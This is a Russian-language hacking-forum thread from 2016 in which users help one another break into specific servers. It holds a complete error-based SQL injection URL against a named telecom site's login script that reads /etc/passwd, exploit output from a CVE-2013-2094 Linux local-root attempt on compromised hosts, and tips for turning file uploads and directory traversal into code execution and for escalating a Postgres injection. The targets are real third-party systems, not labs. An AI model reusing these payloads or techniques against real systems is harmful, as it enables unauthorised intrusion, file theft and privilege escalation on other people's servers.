ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

15.02.2016, 23:24
|
|
Guest
Сообщений: n/a
Провел на форуме: 97114
Репутация:
24
|
|
Сообщение от ghost8
ghost8 said:
↑
Код:
Code:
select load_file(0x2f6574632f706173737764); // читаем /etc/passwd
http://my.moldtelecom.md/scripturi/...16,17,18,19,20,21,22,23,24,25,26,27,28,29+--+
возврашяет тру но нету вывода
|
|
|
|

16.02.2016, 13:05
|
|
Guest
Сообщений: n/a
Провел на форуме: 238786
Репутация:
40
|
|
Вектор еррор, вчера тоже тестил
load_file(hex(0x2f6574632f706173737764))
0x2f6574632f706173737764 это /etc/passwd
п.с сам до конца не разобрался
|
|
|
|

16.02.2016, 16:19
|
|
Guest
Сообщений: n/a
Провел на форуме: 97114
Репутация:
24
|
|
Прочитать файл или что то залить я вижу что не как
|
|
|
|

16.02.2016, 18:46
|
|
Guest
Сообщений: n/a
Провел на форуме: 238786
Репутация:
40
|
|
Сообщение от Octavian
Octavian said:
↑
Прочитать файл или что то залить я вижу что не как
Читать можно
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//my.moldtelecom.md/scripturi/ajax_login.php?username=\&password=%20AND%20(SELECT%208838%20FROM(SELECT%20COUNT(*),CONCAT((MID((IFNULL(CAST(hex(LOAD_FILE(0x2f6574632f706173737764))%20AS%20CHAR),0x2020)),55,54)),%201,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)+--+-[/COLOR][/COLOR]
Скажите "Спасибо фазе"
|
|
|
|

20.02.2016, 10:47
|
|
Guest
Сообщений: n/a
Провел на форуме: 798
Репутация:
0
|
|
Имеется Directory traversal (Не LFI) на windows. Файлы типа SAM прочитать нет возможности. Помимо этого имеется apache на другом порту. Как можно найти полный путь до этого апача или как можно получить доступ к самому серверу?
|
|
|
|

20.02.2016, 11:33
|
|
Участник форума
Регистрация: 14.07.2007
Сообщений: 108
Провел на форуме: 1888785
Репутация:
305
|
|
Сообщение от z0mbie866
z0mbie866 said:
↑
Имеется Directory traversal (Не LFI) на windows. Файлы типа SAM прочитать нет возможности. Помимо этого имеется apache на другом порту. Как можно найти полный путь до этого апача или как можно получить доступ к самому серверу?
Никак. Данной уязвимости(за исключением крайне редких случаев) типа "Directory traversal" недостаточно для проникновения - надо копнуть глубже...
Пути апача по дефолту в винде гуглятся, а не по дефолту - никак не узнаешь без читалки...
|
|
|

20.02.2016, 13:35
|
|
Guest
Сообщений: n/a
Провел на форуме: 798
Репутация:
0
|
|
Имеется cms написанная на node.js, есть возможность заливать файлы. Но web сервер nodejs не позволяет запускать скрипты, можно ли их выполнить?
|
|
|
|

21.02.2016, 17:10
|
|
Guest
Сообщений: n/a
Провел на форуме: 56255
Репутация:
2
|
|
столкнулся с проблемой
рутать пытаюсь сплоитом CVE-2013-2094 Linux 2.6.32/2.6.37 - 3.8.10 PERF_EVENTS local root x86/x86_64
Linux 2.6.34.7-56.40.x86_64 #1 SMP Fri Oct 22 18:48:49 UTC 2010 x86_64 x86_64 x86_64 GNU/Linux
Compiling exp_abacus.c...OK.
[+] Resolved set_fs_root to 0xffffffff810e8af8
[+] Resolved set_fs_pwd to 0xffffffff810e8a96
[+] Resolved __virt_addr_valid to 0xffffffff8102a87c
[+] Resolved init_task to 0xffffffff816c9020
[+] Resolved init_fs to 0xffffffff816d9900
[+] Resolved default_exec_domain to 0xffffffff816d0660
[+] Resolved bad_file_ops to 0xffffffff81412da0
[+] Resolved bad_file_aio_read to 0xffffffff810dd407
[+] Resolved selinux_enforcing to 0xffffffff8194b968
[+] Resolved selinux_enabled to 0xffffffff8194b964
[+] Resolved security_ops to 0xffffffff8194a110
[+] Resolved default_security_ops to 0xffffffff816dc0b0
[+] Resolved sel_read_enforce to 0xffffffff81134709
[+] Resolved audit_enabled to 0xffffffff81909414
[+] Resolved commit_creds to 0xffffffff81057c93
[+] Resolved prepare_kernel_cred to 0xffffffff81057b8a
[+] Resolved xen_start_info to 0xffffffff81886308
[+] Resolved ptmx_fops to 0xffffffff819564e0
[+] Resolved mark_rodata_ro to 0xffffffff81026458
[+] Resolved set_kernel_text_ro to 0xffffffff81026421
[+] Resolved make_lowmem_page_readonly to 0xffffffff81004fdf
[+] Resolved make_lowmem_page_readwrite to 0xffffffff81004f1b
[-] System rejected creation of perf event.
plus Linux 3.2.0-4-amd64 #1 SMP Debian 3.2.65-1+deb7u1 x86_64
Compiling exp_abacus.c...OK.
[+] Resolved set_fs_root to 0xffffffff8111cf7b
[+] Resolved set_fs_pwd to 0xffffffff8111cfda
[+] Resolved __virt_addr_valid to 0xffffffff81030c84
[+] Resolved init_task to 0xffffffff8160d020 (via System.map)
[+] Resolved init_fs to 0xffffffff8162dd20 (via System.map)
[+] Resolved default_exec_domain to 0xffffffff81617610 (via System.map)
[+] Resolved bad_file_ops to 0xffffffff81412cc0 (via System.map)
[+] Resolved bad_file_aio_read to 0xffffffff8110f030
[+] Resolved selinux_enforcing to 0xffffffff817ecbb8 (via System.map)
[+] Resolved selinux_enabled to 0xffffffff81634640 (via System.map)
[+] Resolved apparmor_enabled to 0xffffffff81635b8c (via System.map)
[+] Resolved security_ops to 0xffffffff817eb370 (via System.map)
[+] Resolved default_security_ops to 0xffffffff81630ae0 (via System.map)
[+] Resolved sel_read_enforce to 0xffffffff8116cd0f
[+] Resolved audit_enabled to 0xffffffff817b217c (via System.map)
[+] Resolved commit_creds to 0xffffffff8106439e
[+] Resolved prepare_kernel_cred to 0xffffffff81064657
[+] Resolved xen_start_info to 0xffffffff8172fd38 (via System.map)
[+] Resolved ptmx_fops to 0xffffffff817fa020 (via System.map)
[+] Resolved mark_rodata_ro to 0xffffffff8102dc73
[+] Resolved set_kernel_text_ro to 0xffffffff8102dc41
[+] Resolved make_lowmem_page_readonly to 0xffffffff8100627e
[+] Resolved make_lowmem_page_readwrite to 0xffffffff810062b2
[-] System rejected creation of perf event.
|
|
|
|

22.02.2016, 02:13
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме: 2268
Репутация:
0
|
|
Сообщение от z0mbie866
z0mbie866 said:
↑
Имеется cms написанная на node.js, есть возможность заливать файлы. Но web сервер nodejs не позволяет запускать скрипты, можно ли их выполнить?
Можно попробовать перезаписать существующие скрипты или положить свои в директорию с автоподключением. Все зависит от ваших прав и программного обеспечения. Если абстрагироваться от node - выбор у вас большой: различные start.sh, каталоги с конфигами, bashrc и т.п.
Имеет смысл поискать CVE, позволяющие выполнить код с правами определенного приложения. Их довольно много.
|
|
|

01.03.2016, 07:51
|
|
Guest
Сообщений: n/a
Провел на форуме: 19071
Репутация:
10
|
|
Есть postgres с такими правами
Код:
Code:[*]
postgres (administrator) [3]:
privilege: catupd
privilege: createdb
privilege: super
Код:
Code:
boolean-based blind
Vector: OR NOT [INFERENCE]
Пробовал это https://rdot.org/forum/showthread.php?t=24
Но не проходит стакед запрос, как можно залиться?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|